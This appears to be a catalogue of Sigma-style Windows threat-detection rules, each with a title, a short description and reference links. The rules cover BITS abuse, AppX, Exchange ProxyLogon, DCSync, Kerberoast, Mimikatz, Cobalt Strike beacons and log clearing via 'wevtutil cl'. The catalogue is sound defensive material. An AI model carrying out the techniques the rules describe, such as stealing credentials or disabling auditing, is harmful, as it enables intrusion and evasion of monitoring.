Relevant Anti-Virus Signature Keywords In Application Log Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords. https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31, https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed, https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01, https://www.nextron-systems.com/?s=antivirus
Remote Access Tool - ScreenConnect Command Execution Detects command execution via ScreenConnect RMM https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling, https://github.com/SigmaHQ/sigma/pull/4467
Remote Access Tool - ScreenConnect File Transfer Detects file being transferred via ScreenConnect RMM https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling, https://github.com/SigmaHQ/sigma/pull/4467
Microsoft Malware Protection Engine Crash - WER This rule detects a suspicious crash of the Microsoft Malware Protection Engine https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5, https://technet.microsoft.com/en-us/library/security/4022344
File Was Not Allowed To Run Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events. https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/what-is-applocker, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/using-event-viewer-with-applocker, https://nxlog.co/documentation/nxlog-user-guide/applocker.html
Sysinternals Tools AppX Versions Execution Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths Internal Research
Deployment AppX Package Was Blocked By AppLocker Detects an appx package deployment that was blocked by AppLocker policy https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv
Potential Malicious AppX Package Installation Attempts Detects potential installation or installation attempts of known malicious appx packages https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/, https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/
Deployment Of The AppX Package Was Blocked By The Policy Detects an appx package deployment that was blocked by the local computer policy https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv
Suspicious AppX Package Installation Attempt Detects an appx package installation with the error code "0x80073cff" which indicates that the package didn't meet the signing requirements and could be suspicious Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
Suspicious Remote AppX Package Locations Detects an appx package added to the pipeline of the "to be processed" packages which was downloaded from a suspicious domain. Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
Suspicious AppX Package Locations Detects an appx package added the pipeline of the "to be processed" packages which is located in suspicious locations Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
Uncommon AppX Package Locations Detects an appx package added the pipeline of the "to be processed" packages which is located in uncommon locations Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/, https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting, https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
Suspicious Digital Signature Of AppX Package Detects execution of AppX packages with known suspicious or malicious signature Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
New BITS Job Created Via Bitsadmin Detects the creation of a new bits job by Bitsadmin https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
New BITS Job Created Via PowerShell Detects the creation of a new bits job by PowerShell https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
BITS Transfer Job Downloading File Potential Suspicious Extension Detects new BITS transfer job saving local files with potential suspicious extensions https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
BITS Transfer Job Download From File Sharing Domains Detects BITS transfer job downloading files from a file sharing domain. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md, https://twitter.com/malmoeb/status/1535142803075960832, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
BITS Transfer Job Download From Direct IP Detects a BITS transfer job downloading file(s) from a direct IP address. https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin, https://isc.sans.edu/diary/22264, https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/, https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
BITS Transfer Job With Uncommon Or Suspicious Remote TLD Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md, https://twitter.com/malmoeb/status/1535142803075960832
BITS Transfer Job Download To Potential Suspicious Folder Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
Certificate Private Key Acquired Detects when an application acquires a certificate private key https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html
Certificate Exported From Local Certificate Store Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store. https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html
CodeIntegrity - Unmet Signing Level Requirements By File Under Validation Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired. This event is best correlated with EID 3089 to determine the error of the validation. https://twitter.com/SBousseaden/status/1483810148602814466, https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations
CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked Detects block events for files that are disallowed by code integrity for protected processes https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research
CodeIntegrity - Blocked Image/Driver Load For Policy Violation Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy. https://twitter.com/wdormann/status/1590434950335320065, https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations
CodeIntegrity - Blocked Driver Load With Revoked Certificate Detects blocked load attempts of revoked drivers https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research
CodeIntegrity - Revoked Kernel Driver Loaded Detects the load of a revoked kernel driver https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research
CodeIntegrity - Blocked Image Load With Revoked Certificate Detects blocked image load events with revoked certificates by code integrity. https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research
CodeIntegrity - Revoked Image Loaded Detects image load events with revoked certificates by code integrity. https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research
CodeIntegrity - Unsigned Kernel Module Loaded Detects the presence of a loaded unsigned kernel module on the system. https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research
CodeIntegrity - Unsigned Image Loaded Detects loaded unsigned image on the system https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research
CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module Detects loaded kernel modules that did not meet the WHQL signing requirements. https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations, https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations, Internal Research
Loading Diagcab Package From Remote Path Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability https://twitter.com/nas_bench/status/1539679555908141061, https://twitter.com/j00sean/status/1537750439701225472
DNS Query for Anonfiles.com Domain - DNS Client Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte
DNS Query To MEGA Hosting Website - DNS Client Detects DNS queries for subdomains related to MEGA sharing website https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
DNS Query To Put.io - DNS Client Detects DNS queries for subdomains related to "Put.io" sharing website. https://darkatlas.io/blog/medusa-ransomware-group-opsec-failure
Query Tor Onion Address - DNS Client Detects DNS resolution of an .onion address related to Tor routing networks https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/
DNS Query To Ufile.io - DNS Client Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration https://thedfirreport.com/2021/12/13/diavol-ransomware/
Suspicious Cobalt Strike DNS Beaconing - DNS Client Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns, https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/
Failed DNS Zone Transfer Detects when a DNS zone transfer failed. https://kb.eventtracker.com/evtpass/evtpages/EventId_6004_Microsoft-Windows-DNS-Server-Service_65410.asp
DNS Server Error Failed Loading the ServerLevelPluginDLL Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83, https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx, https://twitter.com/gentilkiwi/status/861641945944391680
USB Device Plugged Detects plugged/unplugged USB devices https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/, https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/
Uncommon New Firewall Rule Added In Windows Firewall Exception List Detects when a rule has been added to the Windows Firewall exception list https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10), https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/#
New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE Detects the addition of a new "Allow" firewall rule by the WMI process (WmiPrvSE.EXE). This can occur if an attacker leverages PowerShell cmdlets such as "New-NetFirewallRule", or directly uses WMI CIM classes such as "MSFT_NetFirewallRule". https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule, https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170, https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/
All Rules Have Been Deleted From The Windows Firewall Configuration Detects when a all the rules have been deleted from the Windows Defender Firewall configuration https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
A Rule Has Been Deleted From The Windows Firewall Exception List Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
The Windows Defender Firewall Service Failed To Load Group Policy Detects activity when The Windows Defender Firewall service failed to load Group Policy https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
Windows Defender Firewall Has Been Reset To Its Default Configuration Detects activity when Windows Defender Firewall has been reset to its default configuration https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
Windows Firewall Settings Have Been Changed Detects activity when the settings of the Windows firewall have been changed https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
ETW Logging/Processing Option Disabled On IIS Server Detects changes to of the IIS server configuration in order to disable/remove the ETW logging/processing option. https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis, https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/, https://learn.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/logfile/
HTTP Logging Disabled On IIS Server Detects changes to of the IIS server configuration in order to disable HTTP logging for successful requests. https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis, https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/, https://learn.microsoft.com/en-us/iis/configuration/system.webserver/httplogging
New Module Module Added To IIS Server Detects the addition of a new module to an IIS server. https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis, https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/, https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/, https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview
Previously Installed IIS Module Was Removed Detects the removal of a previously installed IIS module. https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis, https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/, https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/, https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview
Potential Active Directory Reconnaissance/Enumeration Via LDAP Detects potential Active Directory enumeration via LDAP https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726, https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1, https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs, https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c, https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427, https://ipurple.team/2024/07/15/sharphound-detection/
Standard User In High Privileged Group Detect standard users login that are part of high privileged groups such as the Administrator group https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers, https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection, https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml
ProxyLogon MSExchange OabVirtualDirectory Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c
Mailbox Export to Exchange Webserver Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
Certificate Request Export to Exchange Webserver Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell https://twitter.com/GossiTheDog/status/1429175908905127938
Remove Exported Mailbox from Exchange Webserver Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430
Exchange Set OabVirtualDirectory ExternalUrl Property Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log https://twitter.com/OTR_Community/status/1371053369071132675
MSExchange Transport Agent Installation - Builtin Detects the Installation of a Exchange Transport Agent https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7
Failed MSExchange Transport Agent Installation Detects a failed installation of a Exchange Transport Agent https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=8
NTLM Logon Detects logons using NTLM, which could be caused by a legacy source or attackers https://twitter.com/JohnLaTwC/status/1004895028995477505
NTLM Brute Force Detects common NTLM brute force device names https://www.varonis.com/blog/investigate-ntlm-brute-force
Potential Remote Desktop Connection to Non-Domain Host Detects logons using NTLM to hosts that are potentially not part of the domain. n/a
OpenSSH Server Listening On Socket Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket. https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH, https://winaero.com/enable-openssh-server-windows-10/, https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse, https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx, https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
Azure AD Health Monitoring Agent Registry Keys Access This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent. https://o365blog.com/post/hybridhealthagent/, https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml
Azure AD Health Service Agents Registry Keys Access This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys. https://o365blog.com/post/hybridhealthagent/, https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml
Powerview Add-DomainObjectAcl DCSync AD Extend Right Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer https://twitter.com/menasec1/status/1111556090137903104, https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf
AD Privileged Users or Groups Reconnaissance Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs https://web.archive.org/web/20230329163438/https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html
ADCS Certificate Template Configuration Vulnerability Detects certificate creation with template allowing risk permission subject https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf
ADCS Certificate Template Configuration Vulnerability with Risky EKU Detects certificate creation with template allowing risk permission subject and risky EKU https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf
Add or Remove Computer from DC Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN. https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4741, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4743
Access To ADMIN$ Network Share Detects access to ADMIN$ network share https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5140
AD Object WriteDAC Access Detects WRITE_DAC access to a domain object https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html, https://threathunterplaybook.com/library/windows/active_directory_replication.html, https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html
Active Directory Replication from Non Machine Account Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials. https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html, https://threathunterplaybook.com/library/windows/active_directory_replication.html, https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html
Potential AD User Enumeration From Non-Machine Account Detects read access to a domain user from a non-machine account https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf, http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html, https://learn.microsoft.com/en-us/windows/win32/adschema/attributes-all, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662
Enabled User Right in AD to Control User Objects Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects. https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
Active Directory User Backdoors Detects scenarios where one can control another users or computers account without having to use their credentials. https://msdn.microsoft.com/en-us/library/cc220234.aspx, https://adsecurity.org/?p=3466, https://blog.harmj0y.net/redteaming/another-word-on-delegation/
Weak Encryption Enabled and Kerberoast Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking. https://adsecurity.org/?p=2053, https://blog.harmj0y.net/redteaming/another-word-on-delegation/
Hacktool Ruler This events that are generated when using the hacktool Ruler by Sensepost https://github.com/sensepost/ruler, https://github.com/sensepost/ruler/issues/47, https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4776, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4624
Remote Task Creation via ATSVC Named Pipe Detects remote task creation via at.exe or API interacting with ATSVC namedpipe https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html
Security Eventlog Cleared One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution https://twitter.com/deviouspolack/status/832535435960209408, https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100, https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml
Processes Accessing the Microphone and Webcam Potential adversaries accessing the microphone and webcam in an endpoint. https://twitter.com/duzvik/status/1269671601852813320, https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072
Failed Code Integrity Checks Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5038, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6281
CobaltStrike Service Installations - Security Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement https://www.sans.org/webcasts/119395, https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/, https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
DCERPC SMB Spoolss Named Pipe Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled. https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1, https://dirkjanm.io/a-different-way-of-abusing-zerologon/, https://twitter.com/_dirkjan/status/1309214379003588608
DCOM InternetExplorer.Application Iertutil DLL Hijack - Security Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario. https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html
Mimikatz DC Sync Detects Mimikatz DC sync security events https://twitter.com/gentilkiwi/status/1003236624925413376, https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2, https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662
Device Installation Blocked Detects an installation of a device that is forbidden by the system policy https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6423
Windows Event Auditing Disabled Detects scenarios where system auditing (i.e.: Windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed. Also, it is recommended to turn off "Local Group Policy Object Processing" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as "gpedit.msc". Please note, that disabling "Local Group Policy Object Processing" may cause an issue in scenarios of one off specific GPO modifications - however, it is recommended to perform these modifications in Active Directory anyways. https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit
Important Windows Event Auditing Disabled Detects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled. https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit, https://github.com/SigmaHQ/sigma/blob/master/documentation/logsource-guides/windows/service/security.md
ETW Logging Disabled In .NET Processes - Registry Potential adversaries stopping ETW providers recording loaded .NET assemblies. https://twitter.com/_xpn_/status/1268712093928378368, https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr, https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables, https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38, https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39, https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_, https://bunnyinside.com/?term=f71e8cb9c76a, http://managed670.rssing.com/chan-5590147/all_p1.html, https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code, https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
DPAPI Domain Backup Key Extraction Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html
